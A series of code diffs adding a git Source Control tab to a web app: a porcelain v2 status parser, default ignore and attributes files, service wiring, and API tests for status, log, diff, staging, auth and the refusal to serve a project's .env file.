+  stops octal-escaping non-ASCII), so a CJK path arrives as itself. That
+  means the ONLY safe record separator is the NUL, and splitting this input
+  into "lines" would be a bug waiting for the first odd filename.
+* **The first N fields, then the rest is the path.** Each record has a fixed
+  number of space-separated fields before its path, so the split is
+  ``split(" ", N)`` -- single-space, with a maximum -- and never a generic
+  whitespace split, which would eat the leading space of a file actually
+  named `` leading.txt``.
+* **``MM`` is two entries.** The staged group is built from X and the
+  unstaged group from Y, so a file modified in both places appears in both,
+  which is what VS Code shows and the only way the tab can offer "unstage"
+  and "discard" on it at once. The ``xy`` on both entries stays ``MM``.
+* **An unknown record is skipped, never raised.** This runs on every status
+  poll while the tab is open. If a future git grows a record type, the cost
+  of skipping it is one file missing from a list; the cost of raising is a
+  panel that shows nothing at all and an error the user cannot act on. Same
+  for a truncated record: it is not evidence that the rest is wrong.
+
+``merge_in_progress`` / ``rebase_in_progress`` are parameters rather than
+something read here, because porcelain v2 does not mention them: the answer
+is whether ``MERGE_HEAD``, ``rebase-merge`` or ``rebase-apply`` exist under
+the git directory, which needs a ``rev-parse --git-path`` -- the service's
+job, right after it calls this.
+
+``upstream_gone`` has the same shape of limitation and is worth stating
+plainly: when a tracked remote branch is deleted and pruned, git keeps
+printing ``# branch.upstream`` and simply STOPS printing ``# branch.ab``
+(verified against git 2.53). "Configured but uncounted" is therefore the
+whole signal this format carries, and it is what the flag is computed from.
+G3, which runs ``for-each-ref``, can see the real answer -- ``%(upstream:
+track)`` prints ``[gone]`` -- and may refine the flag there.
+
+Every record shape below was read off real ``git status`` output rather than
+the manual page, including the rare ones (``2 C.`` for a copy, ``u DU`` for
+delete-vs-modify, ``S...`` for a submodule).
+"""
+
+from __future__ import annotations
+
+from .models import FileKind, GitFile, GitStatus
+
+#: git's status letter -> the kind the tab draws an icon from.
+_KIND_BY_LETTER: dict[str, FileKind] = {
+    "M": "modified",
+    "A": "added",
+    "D": "deleted",
+    "R": "renamed",
+    "C": "copied",
+    "T": "typechange",
+}
+
+#: The XY porcelain v2 does NOT print for untracked files. Porcelain v1
+#: spells that state ``??`` and so does every UI built on git, so untracked
+#: entries carry it here: every :class:`~app.core.git.models.GitFile` the
+#: frontend sees then has two characters in ``xy``, and nothing downstream
+#: needs a special case for the one group that would otherwise have none.
+UNTRACKED_XY = "??"
+
+#: Porcelain v2's "nothing happened on this side" (v1 used a space). This
+#: parser only ever reads v2 -- the runner always passes ``--porcelain=v2``.
+_UNCHANGED = "."
+
+#: Fields BEFORE the path in each record type, including the record letter
+#: itself. ``1 <XY> <sub> <mH> <mI> <mW> <hH> <hI> <path>`` is 8 then the
+#: path; ``2`` adds the ``<X><score>`` field; ``u`` carries three stage
+#: modes and three stage hashes.
+_ORDINARY_FIELDS = 8
+_RENAMED_FIELDS = 9
+_UNMERGED_FIELDS = 10
+
+#: Where the ``<X><score>`` field sits in a ``2`` record: last before the
+#: path. Spelled as an offset rather than as ``8`` so it stays right if a
+#: future git adds a field.
+_SCORE_FIELD = _RENAMED_FIELDS - 1
+
+
+def kind_from_letter(letter: str) -> FileKind:
+    """One of git's status letters as a :data:`~app.core.git.models.FileKind`.
+
+    An unrecognised letter is reported as ``modified``, deliberately. Git
+    could grow a letter (it has before), and the three alternatives are all
+    worse: raising turns one odd file into a failed status read, dropping it
+    hides a change the user has made, and widening ``FileKind`` would send
+    the frontend a kind it cannot draw. "Something changed here" is the one
+    thing every status letter has in common, and the exact letters travel
+    alongside in ``GitFile.xy`` for anyone who wants the truth.
+    """
+    return _KIND_BY_LETTER.get(letter, "modified")
+
+
+def _count(token: str, sign: str) -> int | None:
+    """``+3`` / ``-1`` from a ``# branch.ab`` header, or ``None``.
+
+    Strict about the sign because the sign is what says which side of the
+    pair this is; anything else means the header is not what we think it
+    is, and half an answer here becomes a wrong badge in the UI.
+    """
+    if not token.startswith(sign):
+        return None
+    try:
+        count = int(token[1:])
+    except ValueError:
+        return None
+    return count if count >= 0 else None
+
+
+def _score(field: str) -> int | None:
+    """The number in git's ``R100`` / ``C75`` rename-similarity field."""
+    digits = field[1:]
+    try:
+        score = int(digits)
+    except ValueError:
+        return None
+    return score if score >= 0 else None
+
+
+def parse_porcelain_v2(
+    data: bytes,
+    *,
+    merge_in_progress: bool = False,
+    rebase_in_progress: bool = False,
+) -> GitStatus:
+    """Parse one ``--porcelain=v2 --branch --show-stash -z`` payload.
+
+    *data* is git's raw stdout. Each NUL-separated token is decoded on its
+    own as UTF-8 with ``errors="replace"``: with ``core.quotepath=false``
+    git prints the bytes of a filename exactly as the filesystem holds them,
+    and on Windows or a repository made on another machine those bytes are
+    not always valid UTF-8. One unreadable name must cost that name a few
+    replacement characters, not cost the user their whole status panel.
+
+    The two in-progress flags are passed straight through; see the module
+    docstring for why they are not read here.
+    """
+    tokens = [chunk.decode("utf-8", errors="replace")
+              for chunk in data.split(b"\x00")]
+
+    branch: str | None = None
+    detached = False
+    head: str | None = None
+    unborn = False
+    upstream: str | None = None
+    ahead: int | None = None
+    behind: int | None = None
+    stash_count = 0
+    staged: list[GitFile] = []
+    unstaged: list[GitFile] = []
+    untracked: list[GitFile] = []
+    conflicted: list[GitFile] = []
+
+    index = 0
+    while index < len(tokens):
+        token = tokens[index]
+        index += 1
+        # Every record git writes is a letter, a space, then the rest. The
+        # empty token after the final NUL fails this, and so does anything
+        # else that is not a record -- both are skipped rather than guessed
+        # at.
+        if len(token) < 2 or token[1] != " ":
+            continue
+        record = token[0]
+
+        if record == "#":
+            key, _, value = token[2:].partition(" ")
+            if key == "branch.oid":
+                if value == "(initial)":
+                    unborn = True
+                else:
+                    head = value or None
+            elif key == "branch.head":
+                if value == "(detached)":
+                    detached = True
+                else:
+                    branch = value or None
+            elif key == "branch.upstream":
+                upstream = value or None
+            elif key == "branch.ab":
+                first, _, second = value.partition(" ")
+                ahead = _count(first, "+")
+                behind = _count(second, "-")
+                # Half a pair is not an answer: report neither.
+                if ahead is None or behind is None:
+                    ahead = behind = None
+            elif key == "stash":
+                try:
+                    stash_count = max(int(value), 0)
+                except ValueError:
+                    pass
+            continue
+
+        if record == "1":
+            parts = token.split(" ", _ORDINARY_FIELDS)
+            if len(parts) <= _ORDINARY_FIELDS or len(parts[1]) < 2:
+                continue
+            xy = parts[1]
+            path = parts[_ORDINARY_FIELDS]
+            if xy[0] != _UNCHANGED:
+                staged.append(GitFile(path=path, kind=kind_from_letter(xy[0]),
+                                      xy=xy))
+            if xy[1] != _UNCHANGED:
+                unstaged.append(GitFile(path=path,
+                                        kind=kind_from_letter(xy[1]), xy=xy))
+            continue
+
+        if record == "2":
+            parts = token.split(" ", _RENAMED_FIELDS)
+            # The path git renamed FROM is the next token, not a field of
+            # this one -- under ``-z`` the TAB of the human format becomes a
+            # separator, so a rename is two tokens.
+            if index >= len(tokens):
+                continue
+            orig_path = tokens[index]
+            index += 1
+            # Consumed before the record is checked: a malformed ``2`` must
+            # not leave its second token behind to be read as a record.
+            if not orig_path:
+                continue
+            if len(parts) <= _RENAMED_FIELDS or len(parts[1]) < 2:
+                continue
+            xy = parts[1]
+            score = _score(parts[_SCORE_FIELD])
+            path = parts[_RENAMED_FIELDS]
+            for letter, group in ((xy[0], staged), (xy[1], unstaged)):
+                if letter == _UNCHANGED:
+                    continue
+                kind = kind_from_letter(letter)
+                # Only the side that IS the rename carries where it came
+                # from. The worktree half of an ``RM`` is an edit to the new
+                # path, and showing "old -> new" against it would say the
+                # file moved twice.
+                moved = kind in ("renamed", "copied")
+                group.append(GitFile(
+                    path=path,
+                    orig_path=orig_path if moved else None,
+                    kind=kind,
+                    xy=xy,
+                    score=score if moved else None))
+            continue
+
+        if record == "u":
+            parts = token.split(" ", _UNMERGED_FIELDS)
+            if len(parts) <= _UNMERGED_FIELDS or len(parts[1]) < 2:
+                continue
+            # ``xy`` is the whole answer here: ``UU`` and ``DU`` are both a
+            # conflict, and they need different resolve buttons.
+            conflicted.append(GitFile(path=parts[_UNMERGED_FIELDS],
+                                      kind="conflict", xy=parts[1]))
+            continue
+
+        if record == "?":
+            path = token[2:]
+            if path:
+                untracked.append(GitFile(path=path, kind="untracked",
+                                         xy=UNTRACKED_XY))
+            continue
+
+        # ``!`` is an ignored file, which only appears when a caller asks
+        # for ``--ignored`` -- ours never does, and there is no group to
+        # put it in. Anything else is a record type git grew after this was
+        # written. Both are skipped; see the module docstring.
+
+    return GitStatus(
+        branch=branch,
+        detached=detached,
+        head=head,
+        unborn=unborn,
+        upstream=upstream,
+        ahead=ahead,
+        behind=behind,
+        # git prints no ``# branch.ab`` for an upstream whose ref is gone.
+        upstream_gone=upstream is not None and ahead is None,
+        staged=staged,
+        unstaged=unstaged,
+        untracked=untracked,
+        conflicted=conflicted,
+        stash_count=stash_count,
+        merge_in_progress=merge_in_progress,
+        rebase_in_progress=rebase_in_progress,
+    )

--- a/backend/app/core/packs/runner.py
+++ b/backend/app/core/packs/runner.py
@@ -208,6 +208,10 @@ def _stop_process(proc) -> None:
         proc.kill()
 
 
+# Shared by every subprocess the app starts.
+stop_process = _stop_process
+
+
 def _close_output(proc) -> None:
     """Shut the pipe the reader thread is holding.
 

--- a/backend/app/core/project.py
+++ b/backend/app/core/project.py
@@ -25,6 +25,42 @@ else:
 
 FORMAT_VERSION = 1
 
+#: The ``.gitignore`` a project directory starts with.
+#:
+#: Here rather than in ``scripts/project.py`` because there are now two ways
+#: a project becomes a repository -- ``cdui project init`` at the command
+#: line, and the Source Control tab's "Initialize Repository" button -- and
+#: the file they write has to be the same file. The first line is the one
+#: that matters most: ``.env`` holds the user's API keys, and the tab
+#: refuses to serve it at any ref precisely because it must never be
+#: committed in the first place.
+PROJECT_GITIGNORE = """.env
+*.pt
+*.pth
+*.safetensors
+*.onnx
+*.ckpt
+*.pkl
+__pycache__/
+*.db
+.DS_Store
+# interrupted atomic writes
+*.tmp-*
+"""
+
+#: The ``.gitattributes`` a project directory starts with.
+#:
+#: ``*.json text eol=lf`` is the load-bearing line: a project's graph and
+#: layout files ARE its source, they are written by the server with ``\n``
+#: endings, and a Windows checkout with ``core.autocrlf=true`` would
+#: otherwise hand them back with ``\r\n`` -- so every save would rewrite
+#: every line of a file nobody edited, and a review of a one-node change
+#: would show the whole graph. ``linguist-generated`` keeps the layout half
+#: of the pair collapsed in a GitHub diff, where it is noise.
+PROJECT_GITATTRIBUTES = """*.json text eol=lf
+layout/*.layout.json linguist-generated=true
+"""
+
 # Note-node data keys that are canvas GEOMETRY (spec 6.2): extracted into the
 # layout file so a re-bind / resize never dirties the reviewable logic file.
 _NOTE_LAYOUT_KEYS = ("boundToNodeId", "boundOffset", "noteWidth", "noteHeight")

--- a/backend/app/main.py
+++ b/backend/app/main.py
@@ -43,6 +43,7 @@ from .api import (
     routes_data_files,
     routes_execution_outputs,
     routes_execution_state,
+    routes_git,
     routes_graph,
     routes_graph_run,
     routes_images,
@@ -74,6 +75,7 @@ from .core.auth import (
 from .core.body_limit import BodySizeLimitMiddleware, RequestBodyTooLarge
 from .core.cache import execution_cache_stats
 from .core.db import Database
+from .core.git.service import GitService
 from .core.logging_config import setup_logging
 from .core.node_registry import registry
 from .core.node_state_store import NodeStateStore
@@ -390,6 +392,15 @@ async def lifespan(app: FastAPI):
         runs_active=lambda: pack_restart.runs_active(app))
     app.state.pack_service = pack_service
 
+    # ── Source Control: the host's own git, in the open project ────────
+    # Nothing to start and nothing to drain -- it owns no task and no
+    # thread of its own, only a lock and the project directory, which it
+    # reads through a closure rather than at startup: `--project` can be
+    # set after this process has booted, and a service holding the value
+    # from now would keep pointing at wherever it was then.
+    app.state.git_service = GitService(
+        project_dir=lambda: settings.PROJECT_DIR)
+
     yield
 
     # An install in flight when the server stops is cancelled and waited for
@@ -397,6 +408,7 @@ async def lifespan(app: FastAPI):
     # after the process that started it has gone.
     await pack_service.shutdown()
     app.state.pack_service = None
+    app.state.git_service = None
 
     # Drain in-flight runs BEFORE the handle goes away. Their tasks are the
     # only database work in the process that nobody is awaiting, and
@@ -572,6 +584,7 @@ app.include_router(routes_execution_state.router)
 app.include_router(routes_runs.router)
 app.include_router(routes_sweeps.router)
 app.include_router(routes_packs.router)
+app.include_router(routes_git.router)
 app.include_router(routes_system.router)
 app.include_router(routes_llm.router)
 app.include_router(routes_apps.router)

--- a/backend/tests/test_api_git.py
+++ b/backend/tests/test_api_git.py
@@ -32,7 +32,9 @@ git config is kept out of it by the fixture imported below.
 
 from __future__ import annotations
 
+import asyncio
 import os
+import shutil
 import sys
 
 import pytest
@@ -55,6 +57,12 @@ from tests.test_git_service import (  # noqa: F401
     isolated_git,
     make_repo,
 )
+
+#: Every test here drives a real repository, so a machine without git has
+#: nothing to say about these routes. The service tests carry the same mark,
+#: for the same reason.
+pytestmark = pytest.mark.skipif(shutil.which("git") is None,
+                                reason="the host has no git")
 
 BASE_URL = f"http://127.0.0.1:{settings.PORT}"
 
@@ -88,17 +96,20 @@ MUTATION_KEYS = {"status", "changed_paths", "head", "detail"}
 ERROR_KEYS = {"code", "message", "hint", "stderr"}
 
 
-def _install(root) -> GitService:
-    """Point a service at *root* and put it on ``app.state``, as main.py does.
+def _git_service() -> GitService:
+    """A service that finds the project the way the one in ``main.py`` does.
 
-    Both halves matter and neither is enough: the service reads the project
-    directory through a closure over ``settings``, so the monkeypatched
-    setting is what makes it look at this repository -- and the lifespan
-    that would have built it does not run under an ASGI transport.
+    It reads the directory through a closure over ``settings``, so the
+    monkeypatched setting is what points it at a repository -- and it is
+    built by hand because the lifespan that would have built it does not run
+    under an ASGI transport.
+
+    Installing it is the CALLER's job, through ``monkeypatch.setattr``:
+    putting it on ``app.state`` in here would mean the state was already
+    changed by the time monkeypatch read the value it is meant to put back,
+    and the fixture's service would outlive its test.
     """
-    service = GitService(project_dir=lambda: settings.PROJECT_DIR)
-    app.state.git_service = service
-    return service
+    return GitService(project_dir=lambda: settings.PROJECT_DIR)
 
 
 @pytest.fixture
@@ -110,16 +121,9 @@ def project(make_repo, monkeypatch) -> Repo:  # noqa: F811
     """
     repo = make_repo()
     monkeypatch.setattr(settings, "PROJECT_DIR", repo.root)
-    previous = getattr(app.state, "git_service", None)
-    _install(repo.root)
-    try:
-        yield repo
-    finally:
-        if previous is None:
-            if hasattr(app.state, "git_service"):
-                delattr(app.state, "git_service")
-        else:
-            app.state.git_service = previous
+    monkeypatch.setattr(app.state, "git_service", _git_service(),
+                        raising=False)
+    return repo
 
 
 @pytest.fixture
@@ -128,16 +132,9 @@ def empty_project(tmp_path, monkeypatch):
     root = tmp_path / "fresh"
     root.mkdir()
     monkeypatch.setattr(settings, "PROJECT_DIR", root)
-    previous = getattr(app.state, "git_service", None)
-    _install(root)
-    try:
-        yield root
-    finally:
-        if previous is None:
-            if hasattr(app.state, "git_service"):
-                delattr(app.state, "git_service")
-        else:
-            app.state.git_service = previous
+    monkeypatch.setattr(app.state, "git_service", _git_service(),
+                        raising=False)
+    return root
 
 
 @pytest.fixture
@@ -362,7 +359,7 @@ async def test_status_without_a_project_is_a_200_with_a_state(test_client,
     """The first screen most people see. A 409 here would draw an error
     toast on a machine where nothing at all is wrong."""
     monkeypatch.setattr(settings, "PROJECT_DIR", None)
-    monkeypatch.setattr(app.state, "git_service", _install(None),
+    monkeypatch.setattr(app.state, "git_service", _git_service(),
                         raising=False)
 
     response = await test_client.get("/api/git/status")
@@ -378,7 +375,7 @@ async def test_a_write_without_a_project_is_a_409_with_a_code(test_client,
                                                               monkeypatch):
     """Every OTHER route has to fail, and with a code the tab translates."""
     monkeypatch.setattr(settings, "PROJECT_DIR", None)
-    monkeypatch.setattr(app.state, "git_service", _install(None),
+    monkeypatch.setattr(app.state, "git_service", _git_service(),
                         raising=False)
 
     response = await test_client.post("/api/git/stage", json={"all": True})
@@ -509,11 +506,20 @@ async def test_a_dotenv_diff_is_403_ignored(test_client, project, path):
     assert detail["hint"]
 
 
-async def test_a_dotenv_file_read_is_403_at_head_too(test_client, project):
-    project.write(".env", f"{SECRET}\n")
+@pytest.mark.parametrize("ref", ["HEAD", "index", "worktree"])
+async def test_a_dotenv_file_read_is_403_at_every_ref(test_client, project,
+                                                      ref):
+    """The secret is COMMITTED first, so every ref really holds one.
+
+    That is the case the guard exists for: ``.gitignore`` does not un-commit
+    a file, so a ``.env`` that was committed once is in HEAD, in the index
+    and on disk -- and this is an open GET.
+    """
+    project.write(".gitignore", "# nothing is ignored here\n")
+    project.commit("commit the secret", {".env": f"{SECRET}\n"})
 
     response = await test_client.get(
-        "/api/git/file", params={"path": ".env", "ref": "worktree"})
+        "/api/git/file", params={"path": ".env", "ref": ref})
 
     assert response.status_code == 403
     assert (await _detail(response))["code"] == "ignored"
@@ -537,11 +543,17 @@ async def test_a_second_write_while_one_runs_is_409_busy(test_client, project):
 
 async def test_a_read_does_not_queue_behind_a_running_write(test_client,
                                                             project):
-    """A status poll must not stall while a commit runs the user's hooks."""
+    """A status poll must not stall while a commit runs the user's hooks.
+
+    The timeout is the assertion, really: a read that DID take the mutation
+    lock would block forever here, and a test that hangs is one somebody
+    kills rather than reads.
+    """
     service = app.state.git_service
     async with service.lock:
         service.current_op = "commit"
-        response = await test_client.get("/api/git/status")
+        response = await asyncio.wait_for(test_client.get("/api/git/status"),
+                                          timeout=5)
     service.current_op = None
 
     assert response.status_code == 200, response.text

--- a/backend/tests/test_api_git.py
+++ b/backend/tests/test_api_git.py
@@ -582,10 +582,33 @@ async def test_the_page_size_bounds_themselves_are_allowed(test_client,
         assert response.status_code == 200, response.text
 
 
-async def test_a_negative_skip_is_422(test_client, project):
-    response = await test_client.get("/api/git/log", params={"skip": -1})
+@pytest.mark.parametrize("skip", [
+    pytest.param(-1, id="negative"),
+    pytest.param(2**31, id="past-what-git-parses"),
+    pytest.param(10**20, id="absurd"),
+])
+async def test_a_skip_outside_the_range_is_422(test_client, project, skip):
+    """A page past the end of a history is empty; a ``skip`` past what git
+    parses is a FAILURE.
+
+    ``--skip=`` is a signed 32-bit integer to git, and one more than that is
+    "fatal: '2147483648': not an integer", exit 128 (measured on 2.53) --
+    which arrived as a 500 from a GET that needs no token. The bound is in
+    the signature, so it costs no process and no code here.
+    """
+    response = await test_client.get("/api/git/log", params={"skip": skip})
 
     assert response.status_code == 422
+
+
+async def test_the_largest_skip_git_accepts_is_still_a_page(test_client,
+                                                            project):
+    """The bound is git's own, so its edge has to be a 200 and not a 500."""
+    response = await test_client.get("/api/git/log",
+                                     params={"skip": 2**31 - 1})
+
+    assert response.status_code == 200, response.text
+    assert response.json()["commits"] == []
 
 
 async def test_a_commit_diff_without_a_commit_is_400_invalid_value(test_client,

--- a/backend/tests/test_api_git.py
+++ b/backend/tests/test_api_git.py
@@ -1,0 +1,756 @@
+"""The Source Control tab's REST surface: ``/api/git``.
+
+Five promises are tested here rather than in the service tests, because
+each of them only exists once there is a REQUEST in front of the service:
+
+* **the reads are open, the writes are not.** ``GET /api/git/status`` is
+  what the tab polls to draw its panel, so it needs no session token; every
+  route that changes the repository needs one, and gets it from the global
+  ``auth_guard`` rather than from a dependency of its own -- which is why
+  the walk below hits every mutating route anonymously instead of trusting
+  that six handlers each remembered.
+* **the response keys are a contract.** The SPA is typed from
+  ``core/git/models.py``, so a renamed key is a broken panel; the shape
+  tests are key-set equality rather than "contains".
+* **a failure is a code, not a sentence.** The user may not read English,
+  so every refusal travels as ``detail.code`` from a closed vocabulary --
+  and the tests assert the code, not the prose, for exactly that reason.
+* **nothing in that envelope is a credential.** git's stderr can carry one
+  (a remote URL with a token in it), and the redaction that stops it is in
+  the route layer, which is the only place that can be tested for it.
+* **"no project open" is a screen and not an error.** It is the state most
+  users see first, and answering it with a 409 would make the tab draw an
+  error toast on a machine where nothing is wrong.
+
+The repository is real in every test here: ``tmp_path``, a ``git init``,
+and the service pointed at it through ``settings.PROJECT_DIR`` exactly as
+the lifespan points it -- which the test client does not run, so the
+service is installed by hand (the ``pack_service`` precedent in
+``test_api_packs.py``). Nothing touches a network, and the developer's own
+git config is kept out of it by the fixture imported below.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+import pytest
+from fastapi.routing import APIRoute
+from httpx import ASGITransport, AsyncClient
+
+from app.api import routes_git
+from app.config import settings
+from app.core.auth import TOKEN_HEADER
+from app.core.git.errors import GitError
+from app.core.git.service import GitService
+from app.main import _AUTH_EXEMPT_PREFIXES, _prefix_exempt, app
+
+# ``Repo`` is the two-line repository helper; ``isolated_git`` and
+# ``make_repo`` are fixtures, autouse and factory respectively, and are used
+# by NAME below rather than by reference -- which is what pytest wants and
+# what ruff cannot see.
+from tests.test_git_service import (  # noqa: F401
+    Repo,
+    isolated_git,
+    make_repo,
+)
+
+BASE_URL = f"http://127.0.0.1:{settings.PORT}"
+
+#: A token that could not be mistaken for anything else, so a failing
+#: redaction assertion says which string escaped.
+TOKEN = "ghp_16C7e42F292c6912E7710c838347Ae178B4a"
+
+#: Something worth hiding, for the tests about not serving it.
+SECRET = "OPENAI_API_KEY=sk-DO-NOT-LEAK"
+
+# Every key of every model the tab is typed against. Additive is a
+# decision: a new field should break these once, on purpose.
+STATUS_KEYS = {"repo", "status"}
+REPO_KEYS = {"state", "project_dir", "git_version", "nested_toplevel"}
+GIT_STATUS_KEYS = {"branch", "detached", "head", "unborn", "upstream", "ahead",
+                   "behind", "upstream_gone", "staged", "unstaged",
+                   "untracked", "conflicted", "stash_count",
+                   "merge_in_progress", "rebase_in_progress"}
+FILE_KEYS = {"path", "orig_path", "kind", "xy", "score"}
+COMMIT_KEYS = {"sha", "short", "parents", "author_name", "author_email",
+               "authored_at", "refs", "subject", "body"}
+LOG_KEYS = {"commits", "has_more", "unborn"}
+DIFF_KEYS = {"patch", "binary", "truncated", "old_ref", "new_ref", "old_text",
+             "new_text", "old_missing", "new_missing"}
+FILE_AT_REF_KEYS = {"text", "binary", "size", "truncated"}
+IDENTITY_KEYS = {"name", "email", "name_scope", "email_scope"}
+MUTATION_KEYS = {"status", "changed_paths", "head", "detail"}
+
+#: The failure envelope, which is a contract of its own: the frontend
+#: switches on ``code`` and shows the rest to whoever is debugging.
+ERROR_KEYS = {"code", "message", "hint", "stderr"}
+
+
+def _install(root) -> GitService:
+    """Point a service at *root* and put it on ``app.state``, as main.py does.
+
+    Both halves matter and neither is enough: the service reads the project
+    directory through a closure over ``settings``, so the monkeypatched
+    setting is what makes it look at this repository -- and the lifespan
+    that would have built it does not run under an ASGI transport.
+    """
+    service = GitService(project_dir=lambda: settings.PROJECT_DIR)
+    app.state.git_service = service
+    return service
+
+
+@pytest.fixture
+def project(make_repo, monkeypatch) -> Repo:  # noqa: F811
+    """A real repository, open as the project, with a service in front of it.
+
+    One commit and the scaffold, from the factory the service tests use, so
+    the fixtures cannot drift apart.
+    """
+    repo = make_repo()
+    monkeypatch.setattr(settings, "PROJECT_DIR", repo.root)
+    previous = getattr(app.state, "git_service", None)
+    _install(repo.root)
+    try:
+        yield repo
+    finally:
+        if previous is None:
+            if hasattr(app.state, "git_service"):
+                delattr(app.state, "git_service")
+        else:
+            app.state.git_service = previous
+
+
+@pytest.fixture
+def empty_project(tmp_path, monkeypatch):
+    """A project directory that is NOT a repository yet -- what init is for."""
+    root = tmp_path / "fresh"
+    root.mkdir()
+    monkeypatch.setattr(settings, "PROJECT_DIR", root)
+    previous = getattr(app.state, "git_service", None)
+    _install(root)
+    try:
+        yield root
+    finally:
+        if previous is None:
+            if hasattr(app.state, "git_service"):
+                delattr(app.state, "git_service")
+        else:
+            app.state.git_service = previous
+
+
+@pytest.fixture
+async def anon_client():
+    """No session token: what a browser that never bootstrapped would send."""
+    async with AsyncClient(
+        transport=ASGITransport(app=app), base_url=BASE_URL,
+    ) as http:
+        yield http
+
+
+def _link_or_skip(target, link) -> None:
+    """Make a symbolic link, or skip on a machine that will not.
+
+    Windows needs Developer Mode or an elevated process; Linux CI always
+    can, so the tests that use this run there whatever this box says.
+    """
+    try:
+        os.symlink(target, link)
+    except (OSError, NotImplementedError) as exc:
+        pytest.skip(f"this OS would not create a symbolic link: {exc}")
+
+
+async def _detail(response) -> dict:
+    """The failure envelope of a response, checked for shape as it is read."""
+    detail = response.json()["detail"]
+    assert set(detail) >= ERROR_KEYS, detail
+    return detail
+
+
+# --- the shape of the answers -----------------------------------------------
+
+
+async def test_status_carries_exactly_the_documented_keys(test_client, project):
+    """The tab is typed from these three models; a rename breaks it."""
+    project.write("new.txt", "new\n")
+
+    response = await test_client.get("/api/git/status")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert set(body) == STATUS_KEYS
+    assert set(body["repo"]) == REPO_KEYS
+    assert body["repo"]["state"] == "ready"
+    assert body["repo"]["project_dir"] == str(project.root)
+    assert set(body["status"]) == GIT_STATUS_KEYS
+    assert body["status"]["branch"] == "main"
+    assert set(body["status"]["untracked"][0]) == FILE_KEYS
+
+
+async def test_log_carries_exactly_the_documented_keys(test_client, project):
+    response = await test_client.get("/api/git/log")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert set(body) == LOG_KEYS
+    assert set(body["commits"][0]) == COMMIT_KEYS
+    assert body["commits"][0]["subject"] == "first"
+    assert body["has_more"] is False
+    assert body["unborn"] is False
+
+
+async def test_diff_carries_exactly_the_documented_keys(test_client, project):
+    project.write("a.txt", "one\nedited\n")
+
+    response = await test_client.get(
+        "/api/git/diff", params={"path": "a.txt", "scope": "worktree"})
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert set(body) == DIFF_KEYS
+    assert "+edited" in body["patch"]
+    # Not asked for, so both sides stay absent rather than shipping two
+    # copies of every file on every request.
+    assert body["old_text"] is None and body["new_text"] is None
+
+
+async def test_a_diff_with_blobs_fills_both_sides(test_client, project):
+    project.write("a.txt", "one\nedited\n")
+
+    response = await test_client.get(
+        "/api/git/diff",
+        params={"path": "a.txt", "scope": "worktree", "blobs": 1})
+
+    body = response.json()
+    assert body["old_text"] == "one\ntwo\n"
+    assert body["new_text"] == "one\nedited\n"
+
+
+async def test_the_files_of_one_commit_are_git_file_shaped(test_client,
+                                                           project):
+    response = await test_client.get(
+        f"/api/git/commits/{project.head()}/files")
+
+    assert response.status_code == 200, response.text
+    files = response.json()
+    assert set(files[0]) == FILE_KEYS
+    # The first commit is the scaffold and the fixture's own file, so this
+    # is also the check that a ROOT commit is diffed against the empty tree
+    # rather than skipped for having no parent.
+    assert {row["path"] for row in files} == {".gitattributes", ".gitignore",
+                                              "a.txt"}
+    assert {row["kind"] for row in files} == {"added"}
+
+
+async def test_a_file_at_a_ref_is_file_at_ref_shaped(test_client, project):
+    response = await test_client.get(
+        "/api/git/file", params={"path": "a.txt", "ref": "HEAD"})
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert set(body) == FILE_AT_REF_KEYS
+    assert body["text"] == "one\ntwo\n"
+    assert body["binary"] is False
+
+
+async def test_a_write_answers_with_the_status_it_left_behind(test_client,
+                                                              project):
+    """Every mutation carries a fresh status, so the tab never draws a
+    panel one operation out of date."""
+    project.write("new.txt", "new\n")
+
+    response = await test_client.post("/api/git/stage",
+                                      json={"paths": ["new.txt"]})
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert set(body) == MUTATION_KEYS
+    assert set(body["status"]) == GIT_STATUS_KEYS
+    assert body["changed_paths"] == ["new.txt"]
+    assert [entry["path"] for entry in body["status"]["staged"]] == ["new.txt"]
+    assert body["status"]["untracked"] == []
+    assert body["head"] == project.head()
+
+
+async def test_unstage_puts_it_back(test_client, project):
+    """The wiring of the other write that takes a selection."""
+    project.write("new.txt", "new\n")
+    await test_client.post("/api/git/stage", json={"paths": ["new.txt"]})
+
+    response = await test_client.post("/api/git/unstage",
+                                      json={"paths": ["new.txt"]})
+
+    body = response.json()
+    assert response.status_code == 200, response.text
+    assert body["status"]["staged"] == []
+    assert [entry["path"] for entry in body["status"]["untracked"]] == [
+        "new.txt"]
+
+
+async def test_the_identity_reads_and_writes_with_its_scope(test_client,
+                                                            project):
+    """The scope is half the answer: "this repository" or "this machine"."""
+    before = await test_client.get("/api/git/config")
+    assert before.status_code == 200, before.text
+    assert set(before.json()) == IDENTITY_KEYS
+
+    response = await test_client.put(
+        "/api/git/config",
+        json={"name": "Grace Hopper", "email": "grace@example.com"})
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert set(body) == IDENTITY_KEYS
+    assert body["name"] == "Grace Hopper"
+    assert body["email"] == "grace@example.com"
+    # Written --local, and read back as such: the tab never writes the
+    # machine's global config from a web request.
+    assert body["name_scope"] == "local"
+    assert body["email_scope"] == "local"
+
+
+# --- "no project open" is a screen, not an error -----------------------------
+
+
+async def test_status_without_a_project_is_a_200_with_a_state(test_client,
+                                                              monkeypatch):
+    """The first screen most people see. A 409 here would draw an error
+    toast on a machine where nothing at all is wrong."""
+    monkeypatch.setattr(settings, "PROJECT_DIR", None)
+    monkeypatch.setattr(app.state, "git_service", _install(None),
+                        raising=False)
+
+    response = await test_client.get("/api/git/status")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["repo"]["state"] == "no_project"
+    assert body["repo"]["project_dir"] is None
+    assert body["status"] is None
+
+
+async def test_a_write_without_a_project_is_a_409_with_a_code(test_client,
+                                                              monkeypatch):
+    """Every OTHER route has to fail, and with a code the tab translates."""
+    monkeypatch.setattr(settings, "PROJECT_DIR", None)
+    monkeypatch.setattr(app.state, "git_service", _install(None),
+                        raising=False)
+
+    response = await test_client.post("/api/git/stage", json={"all": True})
+
+    assert response.status_code == 409
+    detail = await _detail(response)
+    assert detail["code"] == "no_project"
+    assert detail["hint"]
+
+
+# --- auth --------------------------------------------------------------------
+
+
+async def test_every_mutating_route_needs_the_session_token(anon_client,
+                                                            project):
+    """Walked from the router, so a future write that forgets fails here.
+
